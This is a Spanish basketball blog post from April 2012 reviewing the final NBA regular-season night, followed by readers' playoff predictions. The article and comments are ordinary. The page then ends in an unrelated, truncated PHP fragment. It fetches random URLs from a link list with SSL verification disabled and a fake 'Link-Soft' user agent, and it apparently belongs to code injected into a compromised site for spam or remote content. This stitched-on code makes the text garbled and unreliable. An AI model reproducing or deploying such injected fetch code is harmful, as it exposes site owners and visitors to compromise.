La Crónica: Se acabó la pretemporada, empieza el espectáculo

27 de April de 2012 por TheDeerHunter

Se acabó lo que se daba. 13 partidos para finalizar la regular que se podrían haber ahorrado. Además de las lógicas rotaciones de jugadores, con la consiguiente merma al espectáculo, la foto final no ha cambiado ni una coma de cómo la veíamos ayer.

El líder final de la regular será Chicago. Ya adelantaba nuestro compañero que les valía con igualar el resultado de los Spurs. Ambos ganaron. Los “toros” a los Cavs (75-107) y los “espuelas” a los Warriors, con una nueva actuación sobresaliente de Patrick Mills (107-101).

Por su parte, los Grizzlies ganaron sobrados a Orlando (76-88), con lo que aseguran ventaja campo contra Clippers. Aquí no hubo rotación que valga, más allá de que a Conley le dio por dormitar. Indicativo del valor que le daban a esa ventaja. Por los Magic sí las hubo, aunque dudamos si hubiera variado el resultado de haber utilizado lo que tienen disponible.

Los Celtics también forzaron la máquina frente a los Bucks (74-87) para asegurar su ventaja contra Atlanta. Por poco no les cuesta un susto, ya que Pierce terminó tocado. Atlanta ganó a Dallas (89-106) por lo que finalmente el factor cancha será para los Hawks. Denver destrozó a Minnesota (131-102) y se quedan con el cruce ante Lakers. Poco más hay que añadir relativo a las clasificaciones.

Finalmente no hubo milagro con los Bobcats y se apuntan la peor campaña de la historia de la competición. Hay que darle su crédito, porque es probable que no veamos nunca una hazaña semejante. Ayer los “super-cracks” perdieron sólo de 20 contra los reservas de los Knicks (104-84).

PREMIOS

MVP: Partidos relajados en la mayoría de canchas de la NBA. Patrick Mills ha sido el que mejor lo ha hecho con 34 puntos y 12 rebotes. Por detrás, Josh Smith (23-9-7), DeMarcus Cousins (23-19) y Ed Davis (24-12).

Rookie: Chris Wright, de los Warriors, ha jugado 46 minutos y ha anotado 25 puntos. Josh Harrellson, de los Knicks, también ha disfrutado de un tiempo extra en el que ha aportado 18 puntos y 9 rebotes. Y como ayer, Tobias Harris ha sido el mejor de los Bucks con 16 puntos y 9 rebotes y 3 asistencias.

Sorpresa: Me quedo con las de Jonny Flynn (18 puntos, 5 rebotes y 11 asistencias), Jeremy Evans (13 puntos y 10 rebotes) y sobretodo Solomon Alabi, de los Raptors que anotó 11 puntos y capturó 19 rebotes.

Decepción: Confirmado. Los Charlotte Bobcats de la temporada 2011-2012 son el peor equipo de la historia de la NBA.

Esfuerzo en vano: Premio para Chris Wright, del que ya hemos hablado antes. Jugar en los Warriors ha ayudado mucho a optar este premio en este final de campaña.

Imágenes | AP Photos / Getty Images

Comenta

14 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Bueno pues se acabó la regular por fin. Esta última semana ha sido un pobre espectáculo la verdad.
    Respecto a lo que quedaba por decidir ninguna sorpresa y se dieron todos los resultados que ayer apunté como lógicos. Sólo resaltar que eso de que los Celtics forzaron la máquina es un poco relativo: Pierce se torció el tobillo pero volvió a salir por lo que no reviste gravedad y aún así jugó menos de 7 minutos, Garnett jugó 11, Rondo 25, Allen podría haber jugado y no jugó, al igual que Stiemsma, vamos que muy en serio tampoco se lo tomaron.
    Por lo demás primeras reflexiones de cara a unos playoffs que creo que van a ser apasionantes:
    ESTE:
    Bulls-Sixers: No doy ninguna oportunidad a los Sixers. La eliminatoria servirá a los Bulls para ponerse a punto de cara a lo que les vendrá después y para ir poniendo en tono Playoffs a Rose. Les esperan batallas más duras en las siguientes rondas. Apuesta. Bulls en 4 o 5
    Heat-Knicks: Eliminatoria con morbo e historia. Los Knicks han vivido un sube y baja constante en la temporada y sólo tendrán oportunidad de plantar cara si Melo sigue con su estado de gracia de los últimos partidos. Lo malo, que su defensor será LeBron gran parte del tiempo. Por lo demás, los Knicks necesitarán que su banquillo (Novak, JR, Shumpert) supere claramente al de los Heat y que sus bases jueguen decentemente para alargar la serie. En los Heat, veremos cuanto aportan los que no son el Big 3. De ellos va a depender su asalto al título ya que creo que los 3 grandes harán buenos o muy buenos PO. Puede ser una serie apasionante o un chasco dependiendo de qué Knicks veamos. En principio eliminatoria muy interesante pero con claro pronóstico favorable para Miami. Yo creo que los Knicks van a dar problemas apuesto un Heat en 6.
    Pacers-Magic: Para mí la eliminatoria más clara de primera ronda. Los Pacers son un bloque sólido y con pocas fisuras y los Magic son un equipo sin rumbo, con su estrella lesionada y cabreada, otros jugadores de rotación lesionados o poco motivados… en fin que todo lo que no sea una rápida victoria dirá poco en favor de los de Indiana. Apuesta: Pacers en 4.
    Celtics-Hawks: Para mí la mejor eliminatoria del Este y la más igualada. La ventaja campo da oportunidades a Atlanta que creo que sin ella no habrían tenido. Dicho esto si los Celtics consiguen tener a todo el equipo sano yo creo que son mejores que los Hawks. La adición de Pietrus, Bradley y Stiemsma les da piernas para defender como demonios y el Big 4 les da consistencia y experiencia a raudales en PO. Atlanta no tiene un interior de calidad (a Smith no lo considero interior) por lo que el renacido Garnett les puede hacer pupa en la zona. Atlanta necesitará que JJ esté muy fino y que Josh juegue a su máximo nivel además de que sus tiradores anoten desde fuera para impedir que los Celtics se cierren en su pintura. Creo que los verdes harán valer su experiencia en el clutch y las trampas tácticas de Doc. Apuesta: Celtics en 6 o 7
    Ahora sigo con el Oeste

      Citar

  2. GreenPride dice:
    #2

    OESTE:
    Spurs-Jazz: Los Spurs un año más han sido contra pronóstico el mejor equipo de la regular y yo creo que no van a repetir los problemas del año pasado en PO. Su Big 3 está totalmente sano y dispuesto para un ¿ultimo? asalto al título. Además son claramente el equipo más profundo de la liga (Leonard, Green, Blair, Tiago, Mills, Neal, Diaw, Bonner, Stephen Jackson), todos contribuyen a llevar un ritmo altísimo en defensa durante todo el partido y tienen mucha experiencia en mil batallas y también piernas jóvenes. Los Jazz han hecho una temporada muy meritoria pero en principio no deberían darles muchos problemas. Dependerán de que Milssap y Big Al puedan dominar la pintura como el año pasado lo hiciera Memphis y esto parece difícil. Aún así ganar en cancha de los Jazz nunca es tarea fácil así que les doy un partido. Apuesta: Spurs en 5.
    Thunder-Mavericks: Repetición de las finales de conferencia Oeste del año pasado en primera ronda. A Dallas los fichajes le han salido rana, sobre todo Odom y en principio no deberían tener mucha opción contra los jóvenes y hambrientos Thunder pero… ¿Quien puede descartar a un equipo con Nowitzki, Kidd y Terry en PO? El gran problema es que han perdido los especialistas defensivos, aunque yo creo que van a dar guerra. Por los Thunder si Harden se recupera de la agresión del “Idiota” su Big 3 debería llevarles lejos estos PO. Este gran trío exterior más un juego interior durísimo en defensa y las contribuciones de su banco les hacen candidatos a todo. Deben ser los playoffs de Durantula y sus opciones de anillo yo creo que dependerán de la madurez que demuestre Westbrook para contribuir mucho pero sin jugarse más tiros de la cuenta y dejando a Durant y Harden la bola en los momentos decisivos. Apuesta: Thunder en 6
    Lakers-Nuggets: Los Lakers son para mí el semi-tapado de estos PO. Vienen de jugar bien y parecen haberse dado cuenta por fin de que Bynum es una mina en la pintura. Si Kobe entiende que el dúo Bynum-Gasol es el que les puede hacer optar al título y les involucra al máximo serán un equipo dificilísimo para cualquier rival. Sessions es un base apañado y Barnes, McRoberts, Murphy, Blake y demás deberían contribuir. Lamentablemente para ellos creo que el “Idiota” es muy importante así que si superan la primera ronda le necesitarán para intentar el asalto al anillo. Los Nuggets demasiado han hecho ya con la temporada que han realizado. Un equipo sin estrellas pero con buenos jugadores y gran técnico que para mi gusto no tienen lo suficiente para plantar cara en esta serie. No obstante ya sabemos cómo gusta a los Lakers salirse de los partidos así que alguno cazarán. Para plantar cara necesitarán al mejor McGee y que sus jugadores de calidad (Lawson, Gallinari, Harrington, Afflalo) estén muy finos Apuesta: Lakers en 5 o 6
    Grizzlies-Clippers: La eliminatoria de primera ronda. Así de claro. En principio incierta y con muchísimas interrogantes por resolver. Los Grizzlies han hecho un temporadón sobreponiéndose a la falta de Z-Bo y además ahora lo tienen de vuelta justo a tiempo. Su defensa de las líneas de pase es asfixiante y tienen jugadores que las meten (Gay, Mayo) y una de las mejores parejas interiores de la liga con Marc y Randolph. Además especialistas consistentes como Allen, Speights, Podexter o incluso Arenas. Un equipo completo y que ha acabado en gran forma. Los Clippers son el equipo de la temporada en cuanto a expectación. Un base enorme como Chris Paul y jugadores muy espectaculares como Griffin y Jordan. La baja de Billups les hizo daño pero consiguieron un anotador como Young y a Martin. Sus opciones van a depender de cómo defiendan y de quién va a llevar el peso anotador. Son un poco incógnita pero seguro que un genio como CP3 les va a hacer super competitivos en PO. Aquí antes de empezar tengo muchísimas dudas para apostar. ¿Logrará Memphis machacar a los Clips bajo los aros? ¿Será Griffin el arma ofensiva que necesitan los de LA y cumplirá en su defensa a Randolph? ¿Dominará CP3 el tempo de los partidos o lo hará la defensa de Memphis? Apasionante eliminatoria Apuesto (con mucho miedo a equivocarme): Grizzlies en 7

      Citar

  3. Sancho88 dice:
    #3

    Bueno, pues oficialmente suspendemos los análisis de playoffs no? jeje. Qué currada Green!! Increíble. Yo me estaba currando el análisis de los Celtics contra los Hawks, y realmente veo unas claves muy parecidas a las que has puesto tú. Ya las veremos con los análisis.

    Por lo demás, totalmente de acuerdo con tu titular Deer, se acabaron las tonterías, ahora empiezan los partidos de verdad. Esperemos que jamás se repita un lockout, o que por lo menos la repercusión no sean 5 partidos a la semana con 3 tíos de media lesionados en cada equipo… ha sido un auténtico bochorno, y creo que la imagen de la NBA ha salido bastante perjudicada. A ver si ahora se recuperan todos los recuperables, y con los partidos más espaciados, efectivamente, empieza el espectáculo y las batallas de verdad.

    Dejo un apunte para la eliminatoria más morbosa, y solo diré un nombre: Tyson Chandler. Heat con los mismitos problemas que el año pasado, aunque quizá Turiaf pueda hacer algo contra él, pero en general es la misma historia que la final contra Dallas. Miami sin juego interior sólido más allá de Bosh, Haslem empezó bien pero está fatal, y en NY ha vuelto Stat que en ataque dará problemas. A ver qué hace Spoelstra, pero va a ser un dolor de cabeza grave. Si a eso añadimos a Melo en estado de gracia y un equipo que le gusta jugar rápido… pueden dar algún susto. Cuál es la medicina, doctor? Defensa, defensa y más defensa de Heat. Si les llevan a un partido a pocos puntos, los Knicks pierden fijo. En general, son fáciles de anular, pero yo creo que Miami lo tendrá difícil para parar la zona de los Knicks. Debe aparecer el mejor Lebron, y veremos si no les llevan hasta el séptimo partido… si vuelve Lin puede saltar la sorpresa

      Citar

  4. GreenPride dice:
    #4

    Gracias Sancho88, es sólo una primera visión de las eliminatorias, espero con interés vuestros análisis que siempre me descubren cosas en las que no había caido.
    De acuerdo contigo Sancho88 en lo de Chandler, el año pasado fue factor decisivo en las finales y este año puede darle también más de un quebradero de cabeza a los Heat con su defensa y su intensidad. ¿Jugarán los Knicks los minutos decisivos con Carmelo de 4 o será eso mucha ventaja a la hora del rebote como se vio en el último partido de la regular season?

      Citar

  5. Vader dice:
    #5

    Viendo los mates de ayer parece que Stat a vuelto a buen nivel físico. Siendo así apuesto por él de 4 y Melo de 3 pero supongo que buscando más el juego en el poste. Despues de todo Stat puede abrirse buscando tiro de 5 metros.

    Saludos

      Citar

  6. simon dice:
    #6

    Pues bueno… yo me la juego! Grizzlies en 5!

      Citar

  7. Esteban dice:
    #7

    a 7 juegos no me fio tanto del heat, como tampoco decarto a los knicks, equipo de rachas si los hay,

    el het no tiene rotacion, 2 enormes jugadores y uno muy bueno, pero no mas, shumpert y chandler deberian poder parar a bosh y wade, y queda el tema lebron, q es un tema IMPORTANTE

    durante 7 juegos, si se llega, creo que la banca de los knicks puede pesar, sobretodo novak

    aqui puede estar la clave de la serie, NOVAK, el mejor tirador de la nba en este momento, no juega demasiados minutos por que los internos rivales lo machacan bajo el aro, no pudiendo defender a nadie en la zona pintada, pero OH casualidad el ala pivote del heat es bosh, que tiene alergia al juego duro y la zona pintada, por lo que creo que novak vera muchisimos minutos, y tambien stat como centro, ya q por peor defensor que es, no necesita demasiado para defender a anthony y turiaf

    una rotacion constante entre novak, stat y tyson les puede dar la serie a los knicks

      Citar

  8. melo15 dice:
    #8

    Bueno me dejais hacer el analisis….jajajajajj

      Citar

  9. Vader dice:
    #9

    Bueno a dia de hoy Miami es favorito… Lo ha demostrado en la regular. Y eso de que Shumpert debería parar a Wade… a Wade no lo para nadie en la liga, le podra “molestar” en algún partido como mucho.

    Ademas que los Heat no son sólo el big three, gente como Miller, Jones, Haslem o Battier pueden aportar mucho.

    Saludos

      Citar

  10. Sancho88 dice:
    #10

    Ser optimistas con Knicks significa darles dos victorias como mucho en esta eliminatoria, además de espectáculo y partidos entretenidos. Todo lo que sea fliparse con la eliminación de Heat es ficticio. Cualquier equipo que ha puesto una defensa dura contra Knicks los ha ganado. Ahora bien, que Knicks en su casa jugando inténsamente, seguro que pueden llevarse alguna victoria, porque a Heat le cuesta mover la bola y Knicks defienden muy bien las líneas de pases. Pero yo creo que en playoffs se imponen las defensas, y la de Heat es mucho mejor. Que nadie espere barbaridades de Melo por encima de los 30 puntos, ni mucho menos grandes partidos de Novak…

      Citar

  11. Denise dice:
    #11

    Creo que Indiana pasará por la lesión de Howard, pero no va a ganar la serie en 4 partidos

      Citar

  12. Sancho88 dice:
    #12

    Denise:
    Creo que Indiana pasará por la lesión de Howard, pero no va a ganar la serie en 4 partidos

    Sobre todo porque Ryan Anderson no lo va a permitir. Ayer se escrachó un poco Davis no? otro que tirará de orgullo seguramente. En casa yo creo que Orlando sí puede arañar un par de partidos y poner la eliminatoria 2-2 y con la posibilidad de volver al Center. El día que se enchufan desde el triple estos chicos son temibles. Si Indiana no está al 100% en defensa, lo cual le suele suceder cuando juegan fuera de casa, con mogollón de minutos donde tienen lagunas más que evidentes atrás, Orlando no perdonará, aunque no esté Howard. Lo han demostrado este año, excepto en los partidos estos de mierda de 60 puntos. En otros muchos que no han tenido a Howard y el rival no ha jugado al total de su capacidad, Orlando ha ganado. Yo croe que SVG no les deja relajarse y ahí tienen una baza para dar guerra. Un 4-2 sería lo lógico en esta eliminatoria

      Citar

  13. Sancho88 dice:
    #13

    Me refiero al tobillo, lógicamente

      Citar

  14. simon dice:
    #14

    Denise:
    Creo que Indiana pasará por la lesión de Howard, pero no va a ganar la serie en 4 partidos

    Exacto, yo creo que será un 4-2. No veo a Indiana ganando 4 seguidos a Orlando.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>